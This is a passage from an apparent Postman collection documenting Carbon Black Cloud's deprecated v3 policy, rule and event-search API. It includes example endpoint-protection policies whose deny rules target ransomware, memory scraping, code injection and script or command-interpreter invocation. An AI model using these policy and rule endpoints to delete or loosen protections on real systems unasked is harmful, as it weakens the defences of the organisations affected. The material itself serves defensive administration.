{\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"COMPANY_BLACK_LIST\"\n                    },\n                    \"id\": 2,\n                    \"operation\": \"RUN\",\n                    \"required\": true\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"KNOWN_MALWARE\"\n                    },\n                    \"id\": 3,\n                    \"operation\": \"NETWORK\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"TERMINATE\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"ADAPTIVE_WHITE_LIST\"\n                    },\n                    \"id\": 5,\n                    \"operation\": \"RANSOM\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"IGNORE\",\n                    \"application\": {\n                        \"type\": \"NAME_PATH\",\n                        \"value\": \"**\\\\devenv.exe\"\n                    },\n                    \"id\": 4,\n                    \"operation\": \"RANSOM\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"NAME_PATH\",\n                        \"value\": \"%SystemDrive%\\\\Windows\\\\System32\\\\notepad2.exe\"\n                    },\n                    \"id\": 10,\n                    \"operation\": \"RUN\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"KNOWN_MALWARE\"\n                    },\n                    \"id\": 11,\n                    \"operation\": \"RANSOM\",\n                    \"required\": true\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"KNOWN_MALWARE\"\n                    },\n                    \"id\": 13,\n                    \"operation\": \"MEMORY_SCRAPE\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"KNOWN_MALWARE\"\n                    },\n                    \"id\": 14,\n                    \"operation\": \"CODE_INJECTION\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"KNOWN_MALWARE\"\n                    },\n                    \"id\": 15,\n                    \"operation\": \"RUN_INMEMORY_CODE\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"KNOWN_MALWARE\"\n                    },\n                    \"id\": 17,\n                    \"operation\": \"POL_INVOKE_NOT_TRUSTED\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"KNOWN_MALWARE\"\n                    },\n                    \"id\": 18,\n                    \"operation\": \"INVOKE_CMD_INTERPRETER\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"KNOWN_MALWARE\"\n                    },\n                    \"id\": 20,\n                    \"operation\": \"INVOKE_SCRIPT\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"RESOLVING\"\n                    },\n                    \"id\": 22,\n                    \"operation\": \"RUN\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"PUP\"\n                    },\n                    \"id\": 23,\n                    \"operation\": \"RUN\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"SUSPECT_MALWARE\"\n                    },\n                    \"id\": 24,\n                    \"operation\": \"RUN\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"DENY\",\n                    \"application\": {\n                        \"type\": \"REPUTATION\",\n                        \"value\": \"ADAPTIVE_WHITE_LIST\"\n                    },\n                    \"id\": 25,\n                    \"operation\": \"NETWORK\",\n                    \"required\": false\n                },\n                {\n                    \"action\": \"ALLOW\",\n                    \"application\": {\n                        \"type\": \"NAME_PATH\",\n                        \"value\": \"c:\\\\test\\\\**\"\n                    },\n                    \"id\": 26,\n                    \"operation\": \"INVOKE_SCRIPT\",\n                    \"required\": false\n                }\n            ],\n            \"sensorSettings\": [\n                {\n                    \"name\": \"SHOW_UI\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"BACKGROUND_SCAN\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"POLICY_ACTION_OVERRIDE\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"QUARANTINE_DEVICE_MESSAGE\",\n                    \"value\": \"Your device has been quarantined by your computer administrator.\"\n                },\n                {\n                    \"name\": \"LOGGING_LEVEL\",\n                    \"value\": \"false\"\n                },\n                {\n                    \"name\": \"ALLOW_UNINSTALL\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"QUARANTINE_DEVICE\",\n                    \"value\": \"false\"\n                },\n                {\n                    \"name\": \"RATE_LIMIT\",\n                    \"value\": \"0\"\n                },\n                {\n                    \"name\": \"CONNECTION_LIMIT\",\n                    \"value\": \"0\"\n                },\n                {\n                    \"name\": \"QUEUE_SIZE\",\n                    \"value\": \"100\"\n                },\n                {\n                    \"name\": \"LEARNING_MODE\",\n                    \"value\": \"0\"\n                },\n                {\n                    \"name\": \"SCAN_NETWORK_DRIVE\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"BYPASS_AFTER_LOGIN_MINS\",\n                    \"value\": \"0\"\n                },\n                {\n                    \"name\": \"BYPASS_AFTER_RESTART_MINS\",\n                    \"value\": \"0\"\n                },\n                {\n                    \"name\": \"SCAN_EXECUTE_ON_NETWORK_DRIVE\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"DELAY_EXECUTE\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"PRESERVE_SYSTEM_MEMORY_SCAN\",\n                    \"value\": \"false\"\n                },\n                {\n                    \"name\": \"HASH_MD5\",\n                    \"value\": \"false\"\n                },\n                {\n                    \"name\": \"SCAN_LARGE_FILE_READ\",\n                    \"value\": \"false\"\n                },\n                {\n                    \"name\": \"SHOW_FULL_UI\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"HELP_MESSAGE\",\n                    \"value\": \"CarbonBlack\"\n                },\n                {\n                    \"name\": \"SECURITY_CENTER_OPT\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"CB_LIVE_RESPONSE\",\n                    \"value\": \"true\"\n                },\n                {\n                    \"name\": \"UNINSTALL_CODE\",\n                    \"value\": \"false\"\n                }\n            ]\n        },\n        \"priorityLevel\": \"LOW\",\n        \"version\": 2\n    }\n}"},"url":"{{cb_url}}/integrationServices/v3/policy/","description":"<p>Create a new Policy on the Carbon Black Cloud backend from a policy JSON string. At this time, there is no comprehensive reference to the options available in the Policy schema, so the best way to use this API is to extract the “policy” key from a policy object (retrieved via the “GET” method above) and use it as a template for the new policy.</p>\n<p>The new policy must be contained in a JSON object named <code>policyInfo</code>. The contents of the <code>policyInfo</code> object must be must include the following keys:</p>\n<p>*   <code>description</code>: A description of the policy (can be multiple lines)\n*   <code>name</code>: A one-line name for the policy (shown in the UI)\n*   <code>version</code>: Must be set to “2” for the current policy API\n*   <code>priorityLevel</code>: <code>HIGH</code>, <code>MEDIUM</code> or <code>LOW</code> - the priority score associated with sensors assigned to this policy.\n*   <code>policy</code>: the JSON object containing the policy details. See examples in the <code>policy</code> key from the policies in the GET request above.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#create-new-policy\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","policy",""],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"4a8ac2a3-1ef1-4947-93bb-fee1038c449b"},{"name":"⚠️ Update Existing Policy","id":"eb1d9b8f-0c97-43c6-8c79-8b8b91d4e832","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"policyInfo\": {\n        ... policy info here ...\n    }\n}"},"url":"{{cb_url}}/integrationServices/v3/policy/{{cb_policy_id}}","description":"<p>Update an existing policy with a new policy.</p>\n<p>The new policy must be contained in a JSON object named <code>policyInfo</code>. The contents of the <code>policyInfo</code> object must be must include the following keys:</p>\n<ul>\n<li><code>description</code>: A description of the policy (can be multiple lines)</li>\n<li><code>name</code>: A one-line name for the policy (shown in the UI)</li>\n<li><code>version</code>: Must be set to “2” for the current policy API</li>\n<li><code>priorityLevel</code>: <code>HIGH</code>, <code>MEDIUM</code> or <code>LOW</code> - the priority score associated with sensors assigned to this policy.</li>\n<li><code>policy</code>: the JSON object containing the policy details. See examples in the <code>policy</code> key from the policies in the GET request above.</li>\n<li><code>id</code>: The ID of the policy to replace. This ID must match the ID in the request URL.</li>\n</ul>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#update-existing-policy\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","policy","{{cb_policy_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"4db6c5ad-8cdd-4e5d-a2f3-ede2a95f0d03","name":"Update the Default Policy","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"policyInfo\": {\n        \"description\": \"Default Policy. Please do not edit or rename this Policy. Create your own Policy and test with that.\",\n        \"name\": \"default\",\n        \"id\": 6525,\n        \"policy\": {\n                \"avSettings\": {\n                    \"features\": [\n                        {\n                            \"enabled\": true,\n                            \"name\": \"SIGNATURE_UPDATE\"\n                        },\n                        {\n                            \"enabled\": false,\n                            \"name\": \"ONACCESS_SCAN\"\n                        },\n                        {\n                            \"enabled\": true,\n                            \"name\": \"ONDEMAND_SCAN\"\n                        }\n                    ],\n                    \"updateServers\": {\n                        \"servers\": [\n                            {\n                                \"flags\": 0,\n                                \"regId\": null,\n                                \"server\": [\n                                    \"http://updates.cdc.carbonblack.io/update\"\n                                ]\n                            }\n                        ],\n                        \"serversForOffSiteDevices\": [\n                            \"http://updates.cdc.carbonblack.io/update\"\n                        ]\n                    },\n                    \"apc\": {\n                        \"maxFileSize\": 4,\n                        \"maxExeDelay\": 45,\n                        \"riskLevel\": 4,\n                        \"enabled\": false\n                    },\n                    \"onAccessScan\": {\n                        \"profile\": \"NORMAL\"\n                    },\n                    \"onDemandScan\": {\n                        \"profile\": \"NORMAL\",\n                        \"scanCdDvd\": \"AUTOSCAN\",\n                        \"scanUsb\": \"AUTOSCAN\",\n                        \"schedule\": {\n                            \"days\": null,\n                            \"rangeHours\": 0,\n                            \"startHour\": 0,\n                            \"recoveryScanIfMissed\": true\n                        }\n                    },\n                    \"signatureUpdate\": {\n                        \"schedule\": {\n                            \"intervalHours\": 2,\n                            \"fullIntervalHours\": 0,\n                            \"initialRandomDelayHours\": 4\n                        }\n                    }\n                },\n                \"sensorSettings\": [\n                    {\n                        \"name\": \"ALLOW_UNINSTALL\",\n                        \"value\": \"true\"\n                    },\n                    {\n                        \"name\": \"ALLOW_UPLOADS\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"SHOW_UI\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"ENABLE_THREAT_SHARING\",\n                        \"value\": \"true\"\n                    },\n                    {\n                        \"name\": \"QUARANTINE_DEVICE\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"LOGGING_LEVEL\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"QUARANTINE_DEVICE_MESSAGE\",\n                        \"value\": \"Your device has been quarantined by your computer administrator.\"\n                    },\n                    {\n                        \"name\": \"SET_SENSOR_MODE\",\n                        \"value\": \"0\"\n                    },\n                    {\n                        \"name\": \"SENSOR_RESET\",\n                        \"value\": \"0\"\n                    },\n                    {\n                        \"name\": \"BACKGROUND_SCAN\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"POLICY_ACTION_OVERRIDE\",\n                        \"value\": \"true\"\n                    },\n                    {\n                        \"name\": \"HELP_MESSAGE\",\n                        \"value\": \"CarbonBlack\"\n                    },\n                    {\n                        \"name\": \"PRESERVE_SYSTEM_MEMORY_SCAN\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"HASH_MD5\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"SCAN_LARGE_FILE_READ\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"SCAN_EXECUTE_ON_NETWORK_DRIVE\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"DELAY_EXECUTE\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"SCAN_NETWORK_DRIVE\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"BYPASS_AFTER_LOGIN_MINS\",\n                        \"value\": \"0\"\n                    },\n                    {\n                        \"name\": \"BYPASS_AFTER_RESTART_MINS\",\n                        \"value\": \"0\"\n                    },\n                    {\n                        \"name\": \"SHOW_FULL_UI\",\n                        \"value\": \"true\"\n                    },\n                    {\n                        \"name\": \"SECURITY_CENTER_OPT\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"CB_LIVE_RESPONSE\",\n                        \"value\": \"true\"\n                    },\n                    {\n                        \"name\": \"UNINSTALL_CODE\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"UBS_OPT_IN\",\n                        \"value\": \"true\"\n                    },\n                    {\n                        \"name\": \"ALLOW_EXPEDITED_SCAN\",\n                        \"value\": \"false\"\n                    },\n                    {\n                        \"name\": \"RATE_LIMIT\",\n                        \"value\": \"0\"\n                    },\n                    {\n                        \"name\": \"CONNECTION_LIMIT\",\n                        \"value\": \"0\"\n                    },\n                    {\n                        \"name\": \"QUEUE_SIZE\",\n                        \"value\": \"100\"\n                    },\n                    {\n                        \"name\": \"LEARNING_MODE\",\n                        \"value\": \"0\"\n                    }\n                ],\n                \"directoryActionRules\": [],\n                \"rules\": [\n                    {\n                        \"id\": 31,\n                        \"operation\": \"RUN\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"KNOWN_MALWARE\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"TERMINATE\"\n                    },\n                    {\n                        \"id\": 32,\n                        \"operation\": \"RUN\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"COMPANY_BLACK_LIST\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"TERMINATE\"\n                    },\n                    {\n                        \"id\": 33,\n                        \"operation\": \"NETWORK\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"RESOLVING\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 34,\n                        \"operation\": \"MEMORY_SCRAPE\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"RESOLVING\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 35,\n                        \"operation\": \"RUN_INMEMORY_CODE\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"RESOLVING\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 37,\n                        \"operation\": \"POL_INVOKE_NOT_TRUSTED\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"RESOLVING\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"TERMINATE\"\n                    },\n                    {\n                        \"id\": 38,\n                        \"operation\": \"INVOKE_CMD_INTERPRETER\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"RESOLVING\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 39,\n                        \"operation\": \"RANSOM\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"RESOLVING\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"TERMINATE\"\n                    },\n                    {\n                        \"id\": 40,\n                        \"operation\": \"INVOKE_SCRIPT\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"RESOLVING\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"TERMINATE\"\n                    },\n                    {\n                        \"id\": 41,\n                        \"operation\": \"CODE_INJECTION\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"RESOLVING\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"TERMINATE\"\n                    },\n                    {\n                        \"id\": 42,\n                        \"operation\": \"RUN\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"PUP\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"TERMINATE\"\n                    },\n                    {\n                        \"id\": 43,\n                        \"operation\": \"RUN\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"SUSPECT_MALWARE\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"TERMINATE\"\n                    },\n                    {\n                        \"id\": 44,\n                        \"operation\": \"NETWORK\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"ADAPTIVE_WHITE_LIST\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 45,\n                        \"operation\": \"MEMORY_SCRAPE\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"ADAPTIVE_WHITE_LIST\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 46,\n                        \"operation\": \"RUN_INMEMORY_CODE\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"ADAPTIVE_WHITE_LIST\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 48,\n                        \"operation\": \"POL_INVOKE_NOT_TRUSTED\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"ADAPTIVE_WHITE_LIST\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 49,\n                        \"operation\": \"INVOKE_CMD_INTERPRETER\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"ADAPTIVE_WHITE_LIST\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 50,\n                        \"operation\": \"RANSOM\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"ADAPTIVE_WHITE_LIST\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"TERMINATE\"\n                    },\n                    {\n                        \"id\": 51,\n                        \"operation\": \"INVOKE_SCRIPT\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"ADAPTIVE_WHITE_LIST\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    },\n                    {\n                        \"id\": 52,\n                        \"operation\": \"CODE_INJECTION\",\n                        \"required\": false,\n                        \"application\": {\n                            \"value\": \"ADAPTIVE_WHITE_LIST\",\n                            \"type\": \"REPUTATION\"\n                        },\n                        \"action\": \"DENY\"\n                    }\n                ],\n                \"knownBadHashAutoDeleteDelayMs\": null,\n                \"id\": -1\n            },\n        \"priorityLevel\": \"LOW\",\n        \"version\": 2\n    }\n}"},"url":"{{cb_url}}/integrationServices/v3/policy/6525"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 09 Mar 2021 23:28:27 GMT"},{"key":"Content-Type","value":"application/json;charset=ISO-8859-1"},{"key":"Content-Length","value":"47"},{"key":"Connection","value":"keep-alive"},{"key":"Server","value":"Apache-Coyote/1.1"}],"cookie":[],"responseTime":null,"body":"{\n    \"success\": true,\n    \"message\": \"Success\"\n}"}],"_postman_id":"eb1d9b8f-0c97-43c6-8c79-8b8b91d4e832"},{"name":"⚠️ Delete Policy","id":"d192e6d3-26bd-4d27-9bdf-c35fd8f493dc","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/integrationServices/v3/policy/{{cb_policy_id}}/rule","description":"<p>Delete a policy from the Carbon Black Cloud backend. This API may return an error if devices are actively assigned to the policy id requested for deletion.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#delete-policy\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","policy","{{cb_policy_id}}","rule"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"d192e6d3-26bd-4d27-9bdf-c35fd8f493dc"},{"name":"⚠️ Add Rule to Existing Policy","id":"bb32abca-4455-4b6f-9942-18eff650f1bd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"ruleInfo\": {\n        \"action\": \"DENY\",\n        \"application\": {\n            \"type\": \"REPUTATION\",\n            \"value\": \"COMPANY_BLACK_LIST\"\n        },\n        \"operation\": \"RANSOM\",\n        \"required\": true,\n        \"id\": 1\n    }\n}"},"url":"{{cb_url}}/integrationServices/v3/policy/{{cb_policy_id}}/rule","description":"<p>Add a new rule to an existing policy. Wrap the new rule definition into a JSON object under the key <code>ruleInfo</code>.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#add-rule-to-existing-policy\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","policy","{{cb_policy_id}}","rule"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"bb32abca-4455-4b6f-9942-18eff650f1bd"},{"name":"⚠️ Remove Rule from Existing Policy","id":"eba53e82-fb97-4a89-8c0f-2c705fe0528c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/integrationServices/v3/policy/{{cb_policy_id}}/rule/{{cb_rule_id}}","description":"<p>Removes a rule from an existing policy.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#remove-rule-from-existing-policy\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","policy","{{cb_policy_id}}","rule","{{cb_rule_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"eba53e82-fb97-4a89-8c0f-2c705fe0528c"},{"name":"⚠️ Update Existing Rule","id":"66693d09-b14c-473c-b7b2-c43e7b982e7d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"ruleInfo\": {\n        \"action\": \"DENY\",\n        \"application\": {\n            \"type\": \"REPUTATION\",\n            \"value\": \"COMPANY_BLACK_LIST\"\n        },\n        \"operation\": \"RANSOM\",\n        \"required\": false,\n        \"id\": {{cb_rule_id}}\n    }\n}"},"url":"{{cb_url}}/integrationServices/v3/policy/{{cb_policy_id}}/rule/{{cb_rule_id}}","description":"<p>Update an existing rule with a new rule. Note that the <code>rule_id</code> in the URL must match the <code>id</code> included in the <code>ruleInfo</code> payload passed to this API.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#update-existing-rule\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","policy","{{cb_policy_id}}","rule","{{cb_rule_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"66693d09-b14c-473c-b7b2-c43e7b982e7d"},{"name":"⚠️ Find Events","id":"7d7c5335-7fd1-40f8-ad39-a877f44c47fd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/event?searchWindow=3h","description":"<blockquote>\n<p>⚠️ This enpoint is being deprecated. Please use <strong>ThreatHunter</strong> &gt; <strong>Process Search v2</strong> as that will eventually become a <strong>Platform Search</strong> API covering both NGAV and EDR.</p>\n</blockquote>\n<hr />\n<p>Retrieves all events matching the input search criteria. Response is a list of events in JSON format. Resulting events are sorted in descending order of time.</p>\n<p>Query parameters can be used to filter the list of events:</p>\n<ul>\n<li><p><strong>hostName</strong>: filter on hostnames case insensitive. For example <code>hostName=win-IA9NQ1GN8OI</code> will match the hostname <code>WIN-IA9NQ1GN8OI</code></p>\n</li>\n<li><p><strong>hostNameExact</strong>: filter on the exact hostname. For example <code>hostName=WIN-IA9NQ1GN8OI</code> will only return devices with the exact hostname <code>WIN-IA9NQ1GN8OI</code> but not a host named <code>win-IA9NQ1GN8OI</code></p>\n</li>\n<li><p><strong>ownerName</strong>: filter on owner name case insensitive.</p>\n</li>\n<li><p><strong>ownerNameExact</strong>: same as <code>ownerName</code> but with case sensitivity</p>\n</li>\n<li><p><strong>ipAddress</strong>: filter on events generated by a device with a given external or internal IP address</p>\n</li>\n<li><p><strong>sha256Hash</strong>: filter on events generated by a process with the given SHA-256 hash. Note that this hash must be lowercase.</p>\n</li>\n<li><p><strong>applicationName</strong>: filter on events generated by a process with the given application name (for example, <code>googleupdate.exe</code>. Note that this name must be lowercase)</p>\n</li>\n<li><p><strong>eventType</strong>: filter on events with a given event type. Possible Event Types are:</p>\n<ul>\n<li>NETWORK</li>\n<li>FILE_CREATE</li>\n<li>REGISTRY_ACCESS</li>\n<li>SYSTEM_API_CALL</li>\n<li>CREATE_PROCESS</li>\n<li>DATA_ACCESS</li>\n<li>INJECT_CODE</li>\n</ul>\n</li>\n<li><p><strong>searchWindow</strong>: filter on events generated within a given relative time frame. Note that the default is one day if a <code>searchWindow</code> is not specified. Note that events may not be available past 30 days due to retention policies. Available options for using <code>searchWindow</code>:</p>\n<ul>\n<li><code>3h</code> for the past three hours</li>\n<li><code>1d</code> for the past one day - default</li>\n<li><code>1w</code> for the past one week</li>\n<li><code>2w</code> for the past two weeks</li>\n<li><code>1m</code> for the past one month</li>\n<li><code>all</code> for all</li>\n</ul>\n</li>\n<li><p><strong>startTime</strong> / <strong>endTime</strong>: Using a combination of <code>startTime</code> and <code>endTime</code> filters events for the given absolute timeframe.</p>\n<ul>\n<li><code>startTime</code> and <code>endTime</code> must be used together</li>\n<li>The timestamps are in RFC3339 format. Example: <code>https://api-url.conferdeploy.net/integrationServices/v3/event?startTime=2017-11-15&amp;endTime=2017-11-20</code></li>\n<li><code>endTime</code> - <code>startTime</code> must be &lt;= 2w</li>\n</ul>\n</li>\n</ul>\n<blockquote>\n<p><strong>Note:</strong> There is an additional restriction for this API endpoint specifically – /event only supports up to 2w for the maximum to limit the volume of data returned.</p>\n</blockquote>\n<blockquote>\n<p><strong>Note:</strong> Events may not be available past 30 days due to retention policies.</p>\n</blockquote>\n<p>Each event has a unique ID associated with it in the response payload. The event ID is stored as the value of the <code>eventId</code> key.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#find-events\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","event"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>filter on hostnames case insensitive</p>\n","type":"text/plain"},"key":"hostName","value":""},{"disabled":true,"description":{"content":"<p>filter on the exact 